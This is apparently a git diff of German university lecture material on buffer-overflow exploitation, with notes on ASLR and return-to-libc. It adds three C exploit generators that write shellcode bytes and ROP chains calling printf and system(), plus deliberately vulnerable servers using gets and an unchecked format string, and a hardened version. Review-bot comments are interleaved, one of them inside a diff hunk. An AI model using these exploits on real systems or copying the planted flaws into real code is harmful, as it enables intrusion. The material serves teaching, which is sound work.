diff --git a/20200629/bs-20200629.txt b/20200629/bs-20200629.txt
new file mode 100644
index 0000000000000000000000000000000000000000..5383b09abf5db3606a9eb9101f21965f1d2e683b
--- /dev/null
+++ b/20200629/bs-20200629.txt
@@ -0,0 +1,8 @@
+Exploits, 29.06.2020, 15:38:10
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Früher möglich: Programm in den Stack schreiben, dorthin springen.
+Heute: Nicht-ausführbarer Stack, Address Space Layout Randomization (ASLR)
+Return Oriented Programming erforderlich
+genauer: return-to-libc; noch genauer: return-to-plt
+Gezielt Winz-Funktionen anspringen, um Register zu setzen,
+danach Programm- und Bibliotheksfunktionen anspringen.
diff --git a/20200629/exploit-1.c b/20200629/exploit-1.c
new file mode 100644
index 0000000000000000000000000000000000000000..a35dee9116d764073a7a6bebee1dffa4d67ed2e7
--- /dev/null
+++ b/20200629/exploit-1.c
@@ -0,0 +1,19 @@
+#include <unistd.h>
+#include <stdint.h>
+
+int main (int argc, char **argv)
+{
+ uint64_t my_program_address = 0x7fffffffdfa0;
+ for (int i = 2; i < 0x2a; i++)
+ write (1, "a", 1); // zum Auffüllen, um die Rücksprung-Adresse
+ write (1, &my_program_address, 8); // überschreiben zu können
+ for (int i = 2; i < 34; i++)
+ write (1, "A", 1);
+ write (1, "\x48\x83\xec\x60", 4); // sub $0x60,%rsp hierhin erfolgt der
+ write (1, "\x48\x89\xe7", 3); // mov %rsp,%rdi "Rück-"Sprung
+ write (1, "\xb8\x00\x00\x00\x00", 5); // mov $0x0,%eax
+ write (1, "\xe8\x26\xfe\xff\xff", 5); // callq 0x4003e0 <printf@plt>
+ write (1, "\xeb\xfe", 2); // while (1);
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20200629/exploit-1.txt b/20200629/exploit-1.txt
new file mode 100644
index 0000000000000000000000000000000000000000..974e383df36c343c8121fe13c3bf5e5a43d934aa
Binary files /dev/null and b/20200629/exploit-1.txt differ
diff --git a/20200629/exploit-2.c b/20200629/exploit-2.c
new file mode 100644
index 0000000000000000000000000000000000000000..ecaab1d7877cbaeefd9d620e7ab41686e5e93bef
--- /dev/null
+++ b/20200629/exploit-2.c
@@ -0,0 +1,26 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+ uint64_t mov_rsp_rdi = 0x555555555176;
+ uint64_t add_offset_to_rdi = 0x55555555517d;
+ uint64_t dummy = 0;
+ uint64_t printf_address = 0x7ffff7e24560;
+ uint64_t exit_address = 0x7ffff7e05ea0;
+ uint8_t overflow[OVERFLOW] = "loser";
+ uint8_t payload[] = "I 0WN U!!1! "
+ " ";
+ write (1, overflow, sizeof (overflow));
+ write (1, &mov_rsp_rdi, 8);
+ write (1, &add_offset_to_rdi, 8);
+ write (1, &printf_address, 8);
+ write (1, &exit_address, 8);
+ write (1, &dummy, 8);
+ write (1, payload, sizeof (payload));
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20200629/exploit-2.txt b/20200629/exploit-2.txt
new file mode 100644
index 0000000000000000000000000000000000000000..53b16fc729c568ce104acce9171c8f8b82d001c2
Binary files /dev/null and b/20200629/exploit-2.txt differ
diff --git a/20200629/exploit-3.c b/20200629/exploit-3.c
new file mode 100644
index 0000000000000000000000000000000000000000..a8ddbd9c5ffc3b83ba3acba1d967969324860fbd
--- /dev/null
+++ b/20200629/exploit-3.c
@@ -0,0 +1,25 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+ uint64_t mov_rsp_rdi = 0x555555555176;
+ uint64_t add_offset_to_rdi = 0x55555555517d;
+ uint64_t dummy = 0;
+ uint64_t system_address = 0x7ffff7e109c0;
+ uint64_t exit_address = 0x7ffff7e05ea0;
+ uint8_t overflow[OVERFLOW] = "loser";
+ uint8_t payload[] = "gimp ../common/os-layers.xcf.gz";
+ write (1, overflow, sizeof (overflow));
+ write (1, &mov_rsp_rdi, 8);
+ write (1, &add_offset_to_rdi, 8);
+ write (1, &system_address, 8);
+ write (1, &exit_address, 8);
+ write (1, &dummy, 8);
+ write (1, payload, sizeof (payload));
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20200629/exploit-3.txt b/20200629/exploit-3.txt
new file mode 100644
index 0000000000000000000000000000000000000000..d53f1c805994e7b4e4bf9c35cb75aa493aadc79d
Binary files /dev/null and b/20200629/exploit-3.txt differ
diff --git a/20200629/server-0.c b/20200629/server-0.c
new file mode 100644
index 0000000000000000000000000000000000000000..96f8b4df4c5a467aa5d2ec424434a6a33a6f6127
--- /dev/null
+++ b/20200629/server-0.c
@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+int main (void)
+{
+ char name_buffer[100];
+ char *pass_buffer;
+ char username[] = "peter";
+ char password[] = "Hi!ph1sch";
+
+ printf ("Your name, please: ");
+ gets (name_buffer);
+ printf ("Hello, ");
+ printf (name_buffer);
+ printf ("!\n");
+
+ pass_buffer = getpass ("Your password, please: ");
+ if (strcmp (name_buffer, username) == 0 && strcmp (pass_buffer, password) == 0)
+ printf ("You have access.\n");
+ else
+ printf ("Login incorrect.\n");
+ return 0;
+}
diff --git a/20200629/server-1.c b/20200629/server-1.c
new file mode 100644
index 0000000000000000000000000000000000000000..68f9eb57f5e277413a0206ed9af175033e9cda9d
--- /dev/null
+++ b/20200629/server-1.c
@@ -0,0 +1,10 @@
+#include <stdio.h>
+
+int main (void)
+{
+ char buffer[20];
+ printf ("Your name, please: ");
+ gets (buffer);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+}
diff --git a/20200629/server-2.c b/20200629/server-2.c
new file mode 100644
index 0000000000000000000000000000000000000000..4aac725ae5c30412f0952a770d1c9d9f6c1f6895
--- /dev/null
+++ b/20200629/server-2.c
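Review bot: In server-0.c, `printf (name_buffer)` hands attacker-controlled input to printf as the format string and `gets (name_buffer)` reads without any bound, so the name prompt is both an uncontrolled-format-string sink and a stack overflow; `gets` was removed from the language in C11. Presumably both are deliberate as the lecture's vulnerable baseline, but the hardened form is `fgets (name_buffer, sizeof name_buffer, stdin);` followed by `fputs (name_buffer, stdout);` (or `printf ("%s", name_buffer);`), and `-Wall -Wformat=2` makes the compiler flag the non-literal format string. The same unbounded `gets` appears in server-1.c and server-2.c, where `buffer` is only 20 bytes. `getpass` is also marked obsolescent in POSIX and the credentials are plaintext literals compared with `strcmp`; a header comment naming this file as the intentionally insecure reference would keep readers from copying it into real code.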
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+ asm ("mov $0, %eax");
+ asm ("add $0x28, %rsp");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("mov %rsp, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("add $0x20, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ system ("clear");
+ exit (0);
+}
+
+int main (void)
+{
+ char buffer[20];
+ printf ("Your name, please: ");
+ gets (buffer);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+}
diff --git a/20200629/server-3.c b/20200629/server-3.c
new file mode 100644
index 0000000000000000000000000000000000000000..11c3a7ff2bf4e1f27accebd7d9caddf6d90dfb66
--- /dev/null
+++ b/20200629/server-3.c
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+ asm ("mov $0, %eax");
+ asm ("add $0x28, %rsp");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("mov %rsp, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("add $0x20, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ system ("clear");
+ exit (0);
+}
+
+int main (void)
+{
+ char buffer[20];
+ printf ("Your name, please: ");
+ fgets (buffer, 20, stdin);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+}
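Review bot: In server-2.c, `stuff` is never called from `main` and nothing in the file explains why a run of bare `asm` statements ending in `system ("clear")` is present; presumably it is planted so the lecture binary contains `ret`-terminated instruction sequences and a linked `system`, but a reader cannot tell that from the code. A comment at the top of the function such as `/* Deliberately planted and unreachable from main: exists only for the lecture demo. */` would make the intent explicit, and the same comment applies to the identical function in server-3.c. Note also that `asm` as a keyword is a GNU extension that is not recognized under `-std=c11`; the spelling `__asm__` compiles in strict mode.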
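Review bot: In server-3.c, `fgets (buffer, 20, stdin)` repeats the buffer size as a literal; `fgets (buffer, sizeof buffer, stdin)` keeps the bound tied to the declaration if `buffer` is ever resized. The return value is not checked, so on EOF `buffer` is printed uninitialized, and `fgets` keeps the trailing newline, so the greeting comes out as `Hello, <name>\n!`; `if (fgets (buffer, sizeof buffer, stdin) == NULL) return 1;` and `buffer[strcspn (buffer, "\n")] = '\0';` (which needs `<string.h>`) address both. The bounded read closes the overflow from server-2.c, while the unreachable `stuff` function and the `system` linkage are kept as they were, presumably so the diff against server-2.c isolates the fix.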